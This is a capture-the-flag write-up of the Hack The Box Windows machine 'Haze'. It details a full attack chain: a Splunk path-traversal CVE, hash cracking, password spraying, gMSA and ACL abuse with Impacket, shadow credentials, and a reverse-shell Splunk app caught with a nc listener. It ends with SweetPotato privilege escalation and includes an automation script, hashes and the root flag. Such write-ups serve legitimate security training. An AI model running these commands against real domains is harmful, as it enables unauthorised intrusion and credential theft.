Haze

Haze : Hard windows

machine

Enumeration
we start with Nmap

we found several port 🔓

Haze 1
 Port 8000 open, with a Splunk web page

Haze 2
 wee tried some basic creds : admin : changeme but still no,
So we searched for some CVE and we found this
CVE-2024-36991 by bigb0x that exploit “os.path.join ” module and here is an
exemple

with the splunk.secret you can crack the hash found in authentication.conf

so after cracking the hhash we found a creds

Key = Ld@p_Auth_Sp1unk@2k24

so we created a list with all the enumerated Username and run nxc

Haze 3
 We see that Paul.Taylor is a valid one
so we use the option --rid-brute to extract all Users and Groups using RIDs

➜ haze nxc smb 10.129.232.42 -u paul.taylor -p pass --rid-brute | grep -i "Si

dtypeuser" | cut -d'\' -f2 | cut -d' ' -f1

We run a Password_spray attack and we got a hit on mark.adams

➜ haze nxc smb 10.129.232.42 -u Users -p pass --continue-on-success

SMB 10.129.232.42 445 DC01 [*] Windows Server 2022 Build 20348
x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)

SMB 10.129.232.42 445 DC01 [+] haze.htb\paul.taylor:Ld@p_Auth_Sp

1unk@2k24
SMB 10.129.232.42 445 DC01 [+] haze.htb\mark.adams:Ld@p_Auth_
Sp1unk@2k24

Haze 4
 after we got the new creds we run a --shares scan and they still have the same
typical shares

so we checked the winrm

➜ haze nxc winrm 10.129.232.42 -u mark.adams -p pass

WINRM 10.129.232.42 5985 DC01 [*] Windows Server 2022 Build 20348 (n
ame:DC01) (domain:haze.htb)
WINRM 10.129.232.42 5985 DC01 [+] haze.htb\mark.adams:Ld@p_Auth_Sp
1unk@2k24 (Pwn3d!)

so we got shell

haze evil-winrm -i dc01.haze.htb -u mark.adams -p "Ld@p_Auth_Sp1unk@2k2

4"

Remark : Always use the full FQDN? Windows loves it<3

once we got there we run

whoami /all

and we see that mark.adams is part of a Group called gMSA_Managers

GROUP INFORMATION
-----------------

Haze 5
 Group Name Type SID Attri
butes
=========================================== ============
==== =========================================== ========
==========================================
Everyone Well-known group S-1-1-0
Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580
Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545
Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554
Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574
Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2
Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11
Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15
Mandatory group, Enabled by default, Enabled group
HAZE\gMSA_Managers Group S-1-5-21-323145914-286
50650-2368316563-1107 Mandatory group, Enabled by default, Enabled grou
p
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10
Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448

the name of the group can give us some hint GMSA

Gmsa :
Group Managed Service Accounts are a type of account that can be used with
multiple servers. A gMSA is a domain account that can be used to run services
on multiple servers without having to manage the password.

Haze 6
 User
we check the available service account :

C:\Users\mark.adams\Documents> Get-ADServiceAccount -Filter *

as we see that the property PrincipalsAllowedToRetrieveManagedPassword is empty so we

thought about adding our User mark.adams to it using

Set-ADServiceAccount -Identity "Haze-IT-Backup" -PrincipalsAllowedToRetri

eveManagedPassword "mark.adams"

and using gMSADumper.py from Impacket to dump the ntlm hash and the
password hash

python3 gMSADumper.py -u mark.adams -p "Ld@p_Auth_Sp1unk@2k24" -d h

Haze 7
 aze.htb

Users or groups who can read password for Haze-IT-Backup$:

> mark.adams
Haze-IT-Backup$:::735c02c6b2dc54c3c8c6891f55279ebc
Haze-IT-Backup$:aes256-cts-hmac-sha1-96:38c90a95f7e038a6cb57d3e21c
405c2875e88f1edbb1e082f1dd75d01eda60fd
Haze-IT-Backup$:aes128-cts-hmac-sha1-96:0926f5e64d85018a506ecadff3d
f4f95

After we got the Creds we need to test them

and we got hit , but the shares are typical as always

so after going back to bloodhound we found that HAZE-IT-Backups

(For some how you need to do the process of bloodhound twice to get the
outbound)
Command:

nxc ldap 10.129.28.250 -u Haze-IT-Backup$ -H '735c02c6b2dc54c3c8c6891

f55279ebc' --bloodhound --dns-server 10.129.28.250 -c All --dns-tcp

Haze 8
 and after we upload it and search for a way we found that Haze-IT-Backup$ have a
WriteOwner on

SUPPORT_SERVICES Group:

WriteOwner Abuse
So first We need to make sure that Haze-IT-Backup$ owns the group:

impacket-owneredit -action write -new-owner 'Haze-IT-Backup$' -target-dn

'CN=SUPPORT_SERVICES,CN=USERS,DC=HAZE,DC=HTB' 'haze.htb'/'Haze-I
T-Backup$' -hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -dc-ip 10.129.2
8.250 2>/dev/null

Then we need to grant it the FullControl over that group

impacket-dacledit -action 'write' -rights 'FullControl' -principal 'Haze-IT-Back

up$' -target-dn 'CN=SUPPORT_SERVICES,CN=USERS,DC=HAZE,DC=HTB' 'h
aze.htb'/'Haze-IT-Backup$' -hashes ':735c02c6b2dc54c3c8c6891f55279eb
c' -dc-ip 10.129.28.250 2>/dev/null

and then since we only have the nthash we fulfill the lmhash using “ffffff“
combination
and used pth-net to add Haze-IT-Backup$ to the group

Haze 9
 pth-net rpc group addmem "SUPPORT_SERVICES" Haze-IT-Backup$ -U "haz
e.htb"/"Haze-IT-Backup$"%"ffffffffffffffffffffffffffffffff":"735c02c6b2dc54c3c8
c6891f55279ebc" -S dc01.haze.htb 2>/dev/null

Since there is a (wipe all) after some minutes, we made a small script to make the
process faster:

ForceChangePassword Abuse
After searching we found that the members of the SUPPORT_SERVICES have
ForceChangePassword on Edward.martin

Haze 10
 For somehow using net rpc didn’t work

pth-net rpc password "edward.martin" "newP@ssword2022" -U "haze.ht

b"/"Haze-IT-Backup$"%"ffffffffffffffffffffffffffffffff":"735c02c6b2dc54c3c8c68
91f55279ebc" -S "dc01.haze.htb"

So we thought about using the pywhisker.py

pywhisker git:(main) ✗ python3 pywhisker.py -d haze.htb -u 'Haze-IT-Backup

$' -H ':735C02C6B2DC54C3C8C6891F55279EBC' --target edward.martin --a
ction "add"
[*] Searching for the target account
[*] Target user found: CN=Edward Martin,CN=Users,DC=haze,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: e2f859e7-20d4-2d76-99c1-b179f
52
[*] Updating the msDS-KeyCredentialLink attribute of edward.martin
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Converting PEM -> PFX with cryptography: gP3N5Kkl.pfx
[+] PFX exportiert nach: gP3N5Kkl.pfx
[i] Passwort für PFX: Xl7xpyeRCKx7XkZPk90I
[+] Saved PFX (#PKCS12) certificate & key at path: gP3N5Kkl.pfx
[*] Must be used with password: Xl7xpyeRCKx7XkZPk90I
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

pfx file : gP3N5Kkl.pfx

Passwort für PFX: Xl7xpyeRCKx7XkZPk90I

and then uses gettgtpkinit.py from PKINITtools to get a TGT

Haze 11
 gettgtpkinit.py -cert-pfx TlFBFH4x.pfx -pfx-pass PfmIKxXrYWsitr0TcSMT ha
ze.htb/edward.martin edward.martin.ccache

and after fixing a small script for automation we got this

echo "
Writing the New owner ....
"
impacket-owneredit -action write -new-owner 'Haze-IT-Backup$' -target-dn
'CN=SUPPORT_SERVICES,CN=USERS,DC=HAZE,DC=HTB' 'haze.htb'/'Haze-I
T-Backup$' -hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -dc-ip 10.129.2
8.250 2>/dev/null
#spinner
echo "Done."

echo "
Adding Rights ....
"
impacket-dacledit -action 'write' -rights 'FullControl' -principal 'Haze-IT-Back
up$' -target-dn 'CN=SUPPORT_SERVICES,CN=USERS,DC=HAZE,DC=HTB' 'h
aze.htb'/'Haze-IT-Backup$' -hashes ':735c02c6b2dc54c3c8c6891f55279eb
c' -dc-ip 10.129.28.250 2>/dev/null
#spinner()
echo "Adding Haze-IT-Backup$ to SUPPORT_SERVICES Group ...."
pth-net rpc group addmem "SUPPORT_SERVICES" Haze-IT-Backup$ -U "haz
e.htb"/"Haze-IT-Backup$"%"ffffffffffffffffffffffffffffffff":"735c02c6b2dc54c3c8
c6891f55279ebc" -S dc01.haze.htb 2>/dev/null
#spinner()
echo "User added :)"
echo "Running pywhisker command"
output=$(pywhisker.py -d haze.htb -u 'Haze-IT-Backup$' -H ':735C02C6B2D
C54C3C8C6891F55279EBC' --target edward.martin --action "add")

sleep 2
# Extract the .pfx file name using grep and regex

Haze 12
 pfx_file=$(echo "$output" | grep -oP "(?<=Converting PEM -> PFX with crypto
graphy: )\S+")

# Extract the password using grep and regex

pfx_password=$(echo "$output" | grep -oP "(?<=Passwort für PFX: )\S+")

echo "Fixing the problem (The clock skew is too great)"

sudo ntpdate 10.129.28.250
echo "
fixed.
"

echo "Getting TGT in Process"

sudo gettgtpkinit.py -cert-pfx "$pfx_file" -pfx-pass "$pfx_password" haze.ht
b/edward.martin edward.martin.ccache

echo "Exporting TGT ...."

export KRB5CCNAME=edward.martin.ccache
echo "Done"
sudo ntpdate 10.129.28.250
echo "Connecting ....."
evil-winrm -i dc01.haze.htb -r HAZE.HTB
#echo "Adding Mark.adams to SUPPORT_SERVICES Group ...."
#pth-net rpc group addmem "SUPPORT_SERVICES" mark.adams -U "haze.ht
b"/"Haze-IT-Backup$"%"ffffffffffffffffffffffffffffffff":"735c02c6b2dc54c3c8c68
91f55279ebc" -S dc01.haze.htb 2>/dev/null

REMARK( you need to fix the /etc/krb5.conf file like this :

Haze 13
 [libdefaults]
dns_lookup_kdc = false
dns_lookup_realm = false
default_realm = HAZE.HTB

[realms]
HAZE.HTB = {
kdc = dc01.HAZE.htb
admin_server = DC01.HAZE.htb
default_domain = HAZE.htb
}

[domain_realm]
.haze.htb = HAZE.HTB
haze.htb = HAZE.HTB

ROOT
After getting the shell with edward.martin we found a file.zip in the backup

Haze 14
 and after unziping it we found a password : Sp1unkadmin@2k24
we Try it with the web page http://<IP>:8000 and we got a hit

I asked chatGPT where we can upload files (any kind of it ) in splunk web page
and we got this

after we when there we found this page that tell that we need to upload a file with
the extension .spl or .tar.gz ;

Haze 15
 Exploit Using
https://github.com/0xjpuff/reverse_shell_splunk
We found this exploit from GitHub that
uses this file hierarchy

A small explanation :
when we upload the file the Splunk web page uses that file to boot from it (as it is
a replacement )
so the attacker should modify the rev.py and the run.ps1 and add his IP and Port.
From Github:

Haze 16
 inputs.conf in this instance is the configuration file that tells splunk to launch t
he run.bat file and at what interval. In the example below "run.bat" will be run
every 10 seconds. Because splunk only runs .bat files, the call inside "run.bat"
is to a file with its same name. When run.bat is called, run.ps1 being in the sa
me directory and having the same name will be run.

Steps:
The attacker should modify the rev.py and the run.ps1 and add his IP and Port.

And then zip it and rename it to .spl . And we’re ready to upload it.

nc -nlvp 4444
After opening a Listener on port 4444
and uploading the file We got a Shell
as alexander.green.

Haze 17
 So after i got a shell i thought about throwing a Potato like SweetPotato because

alexander.green have “SeImpersonatePrivilege”.

After uploading SweetPotato.exe to the machine ( in the alexander.green Folder)

We run this command

./SweetPotato.exe -a 'type C:\users\Administrator\desktop\root.txt'

740541ab68491700314f74efe6a86efb

Haze 18